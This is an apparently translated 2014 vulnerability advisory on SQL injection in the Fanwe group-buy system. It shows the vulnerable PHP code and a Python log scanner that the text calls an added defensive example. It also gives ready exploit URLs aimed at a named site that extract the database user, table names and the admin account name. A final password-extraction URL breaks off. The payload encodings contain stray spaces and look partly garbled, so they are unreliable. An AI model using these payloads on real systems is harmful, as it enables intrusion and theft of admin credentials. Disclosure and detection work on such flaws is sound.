Fanwe group-buy system SQL injection vulnerability affects up to the latest version 4.2 - Vulnerability warning - Black Bar Safety Net

2014-04-10T00:00:00
ID MYHACK58:62201444405
Type myhack58
Reporter Anonymous
Modified 2014-04-10T00:00:00

Description

This group-buy system used to be free; I don't know why it now seems to have started charging.

This vulnerability has also been present all along in several earlier versions!

Vulnerability file: app/source/article_show.php

<?php
if ($_REQUEST["m"] == "Article" && $_REQUEST["a"] == "showByUname") {
    $uname = $_REQUEST["uname"]; // no filtering
    if ($uname != "") {
        $uname = rawurldecode($uname); // decoded again here, so GPC escaping has no effect
        // ... the following code is omitted
    }
}

So there is an obvious injection here, and it exists in N versions.
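A defensive check for the double-decoding issue above, as an added example that is not part of the original advisory: it scans web access logs for `showByUname` requests whose `uname` value is still percent-encoded after the single decode PHP applies, or that contains SQL metacharacters. The log format, the sample lines and the character policy are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed policy: none of these belong in a user name.
SUSPICIOUS = re.compile(r"['#()]|--|\b(?:select|union|concat|information_schema)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2014:10:00:00 +0800] "GET /index.php?m=Article&a=showByUname&uname=alice HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Apr/2014:10:00:07 +0800] "GET /index.php?m=Article&a=showByUname&uname=%2527%20or%201%3D1%2523 HTTP/1.1" 200 734',
    '203.0.113.9 - - [10/Apr/2014:10:00:09 +0800] "GET /index.php?m=Article&a=show&id=3 HTTP/1.1" 200 300',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (value, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_line(line):
    """Return a finding for a suspicious showByUname request, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if query.get("m") != ["Article"] or query.get("a") != ["showByUname"]:
        return None
    # parse_qs has decoded once, as PHP does before the script's rawurldecode().
    once = query.get("uname", [""])[0]
    final, extra = fully_decode(once)
    reasons = []
    if extra:
        reasons.append("multiply-encoded")
    if SUSPICIOUS.search(final):
        reasons.append("sql-metacharacters")
    return {"uname": final, "reasons": reasons} if reasons else None

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [finding for finding in map(inspect_line, lines) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the script reads `$_REQUEST`, the same parameters sent in a POST body will not show up in an access log and need request-body inspection instead.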

There is also a path disclosure vulnerability: mapi/comm.php

exp:

http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%2527or%2 0 1=%28select%2 0 1%20from%2 0%28select%20count%2 8%2 9,concat%28floor%28rand%2 8 0%2 92%2 9,%28select%20user%2 8% 2 9% 2 9%29a%20from%20information_schema. tables%20group%20by%20a%29b%2 9% 2 5 2 3

Get the first table name; the key point is the table prefix

http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%27or%2 0 1%3D%28select%2 0 1%20from%2 0%28select%20count%2 8%2 9%2Cconcat%28floor%28rand%2 8 0% 2 92%2 9%2C%28select%20table_name%20from+information_schema. columns+where+table_schema%3Ddatabase%2 8% 2 9%20limit%2 0 0%2C1%2 9%29a%20from%20information_schema. tables%20group%20by%20a%29b%2 9% 2 3

Obtaining the account name

http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%2 0 1%3D%28select%2 0 1%20from%2 0%28select%20count%2 8%2 9%2Cconcat%28floor%28rand%2 8 0% 2 92%2 9%2C%28select%20adm_name%20from%20fanwe_admin%20limit%2 0 0%2C1%2 9%29a%20from%20information_schema. tables%20group%20by%20a%29b%2 9% 2

To obtain the password, the value needs to be truncated; I don't know why.

http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%2 0 1%3D%28select%2 0 1%20fr